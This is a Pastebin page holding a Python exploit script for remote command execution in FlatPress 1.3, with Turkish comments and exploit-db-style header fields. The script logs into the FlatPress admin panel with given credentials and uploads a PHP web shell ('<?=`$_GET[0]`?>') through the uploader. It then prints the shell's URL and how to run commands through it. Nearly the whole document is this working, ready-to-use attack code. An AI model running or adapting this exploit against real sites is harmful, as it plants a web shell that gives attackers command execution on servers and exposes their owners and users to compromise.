Advertisement
FlyFar

FlatPress v1.3 - Remote Command Execution

Apr 22nd, 2024
608
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.48 KB | Cybersecurity | 0 0
  1. # Exploit Title: FlatPress v1.3 - Remote Command Execution
  2. # Discovered by: Ahmet Ümit BAYRAM
  3. # Discovered Date: 19.04.2024
  4. # Vendor Homepage: https://www.flatpress.org
  5. # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
  6. # Tested Version: 1.3 (latest)
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import time
  11. import random
  12. import string
  13.  
  14. def random_string(length=5):
  15.     """Rastgele bir string oluşturur."""
  16.     letters = string.ascii_lowercase
  17.     return ''.join(random.choice(letters) for i in range(length))
  18.  
  19. def login_and_upload(base_url, username, password):
  20.     filename = random_string() + ".php"
  21.     login_url = f"http://{base_url}/login.php"
  22.     upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"
  23.  
  24.     with requests.Session() as session:
  25.         # Exploiting
  26.         print("Exploiting...")
  27.         time.sleep(1)
  28.  
  29.         # Giriş yapma denemesi
  30.         login_data = {
  31.         'user': username,
  32.         'pass': password,
  33.         'submit': 'Login'
  34.         }
  35.         print("Logging in...")
  36.         response = session.post(login_url, data=login_data)
  37.         time.sleep(1)
  38.  
  39.         if "Logout" in response.text:
  40.             print("Login Successful!")
  41.         else:
  42.             print("Login Failed!")
  43.             print(response.text)
  44.             return
  45.  
  46.         # Dosya yükleme denemesi
  47.         print("Shell uploading...")
  48.         time.sleep(1)
  49.  
  50.         # Form verileri ve dosyalar
  51.         files = {
  52.         'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
  53.         }
  54.         form_data = {
  55.         '_wpnonce': '9e0ed04260',
  56.         '_wp_http_referer': '/admin.php?p=uploader',
  57.         'upload': 'Upload'
  58.         }
  59.  
  60.         response = session.post(upload_url, files=files, data=form_data)
  61.  
  62.         if "File(s) uploaded" in response.text or "Upload" in response.text:
  63.             shell_url = f"http://{base_url}/fp-content/attachs/{filename}"
  64.             print(f"Your Shell is Ready: {shell_url}")
  65.             time.sleep(1)
  66.             print(f"Shell Usage: {shell_url}?0=command")
  67.         else:
  68.             print("Exploit Failed!")
  69.             print(response.status_code, response.text)
  70.  
  71. # Örnek kullanım: python script.py siteadi.com username password
  72. if __name__ == "__main__":
  73.     import sys
  74.     if len(sys.argv) != 4:
  75.         print("Usage: script.py <base_url> <username> <password>")
  76.     else:
  77.         base_url, username, password = sys.argv[1:]
  78.         login_and_upload(base_url, username, password)
  79.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement